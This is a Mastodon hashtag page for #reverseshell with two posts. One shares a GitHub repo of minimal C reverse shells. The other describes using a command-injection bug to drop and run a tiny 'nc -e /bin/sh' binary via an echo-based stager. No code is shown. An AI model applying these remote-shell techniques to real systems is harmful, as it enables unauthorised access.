mstdn.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
A general-purpose Mastodon server with a 500 character limit. All languages are welcome.

Administered by:

Server stats:

7.6K
active users

#reverseshell

0 posts0 participants0 posts today

Hello!
I wanted to share 2 reverse shells I have made in C, for both Windows and Linux! It's only the source codes of them, non-compiled that is.

They are made with being as short as possible in mind, so they are not "fancy" in any way.

Contributions is ofc welcome! Reach out to me if you have any questions.
Have a nice day! I will leave the link to the GitHub Repo below.

- github.com/loneicewolf/Reverse

*Hopefully they are useful :tuturu:

GitHubGitHub - loneicewolf/ReverseShellsContribute to loneicewolf/ReverseShells development by creating an account on GitHub.

I had a command injection vulnerability, but the target system didn't have netcat or other (obvious) means of getting a reverse shell. What to do? I wrote a minuscule "nc -e /bin/sh" in C + mips assembly, then wrote a small JavaScript stager that would encode the binary to a "echo -ne 'payload'" command that would then be used to drop the binary to /tmp, chmod it and execute with desired ip address and port. The nanonc tool sintonen.fi/src/nanonc/ supports both listen and connect back modes. The code calls linux kernel directly, doesn't use libc at all and has a custom startup code. The (low effort) stripped mipsel binary was 1372 bytes. I'm sure it could be made way way smaller, but this was well within reason already.

Was this total overkill and wholly unnecessary amount of work just to exploit this vulnerability? Yes. Did I learn a lot about mips platform, mips calling conventions and how to create tiny apps calling the linux kernel directly? Oh yes. #infosec #hacking #exploitation #tooling #reverseshell